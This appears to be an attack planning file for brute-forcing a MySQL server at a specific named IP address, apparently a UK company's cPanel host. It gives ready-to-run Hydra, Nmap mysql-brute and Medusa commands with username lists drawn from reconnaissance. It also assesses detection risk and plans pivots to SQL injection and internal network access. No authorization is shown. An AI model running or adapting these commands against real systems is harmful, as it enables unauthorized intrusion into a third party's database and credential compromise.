# MySQL Brute-Force Attack Setup
# Target: 85.92.91.11:3306 (UK cPanel/MySQL server)
# Date: 2026-01-23

## TARGET VALIDATION (from Week 2)
# MySQL 3306 - CONFIRMED OPEN (Week 2 Day 1)
# Host-based ACL detected - "Host 'x.x.x.x' is not allowed to connect"
# NOTE: External brute-force may be blocked by host ACL

## WORDLISTS
# Primary: /usr/share/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt (23 creds)

## CUSTOM USERNAMES (based on recon)
# - root (default MySQL admin)
# - admin
# - mysql
# - wearesocial (company name)
# - was_admin (from WordPress enum)
# - dbadmin
# - cpanel
# - webapp

## HYDRA COMMAND (MySQL)
# Standard brute-force:
hydra -C /usr/share/seclists/Passwords/Default-Credentials/mysql-betterdefaultpasslist.txt mysql://85.92.91.11:3306 -t 4 -V

# With custom usernames:
hydra -L /home/samir/custom_folders_backup/jobs/2026-op/recon/week3/day3/mysql-users.txt -P /home/samir/custom_folders_backup/jobs/2026-op/recon/week3/day3/mysql-passwords.txt mysql://85.92.91.11:3306 -t 4 -V

## NMAP NSE SCRIPTS
nmap --script mysql-brute -p 3306 85.92.91.11 --script-args userdb=mysql-users.txt,passdb=mysql-passwords.txt

## MEDUSA ALTERNATIVE
medusa -h 85.92.91.11 -U mysql-users.txt -P mysql-passwords.txt -M mysql -t 4

## EXPECTED OUTCOME
# HIGH PROBABILITY: Host ACL will block external connections
# BACKUP PLAN: If MySQL brute-force fails, pivot to:
#   1. SQLi via web applications (iris-backend, WordPress)
#   2. Internal network access first, then MySQL

## RISK ASSESSMENT
# - Rate: LOW (host ACL likely blocking)
# - Detection: MEDIUM (failed auth logs)
# - Success: 30% (external) / 65% (internal)

## EXECUTION NOTES
# 1. Test single credential first to confirm connectivity
# 2. If host ACL error, document and move to backup vectors
# 3. Log all attempts for reporting
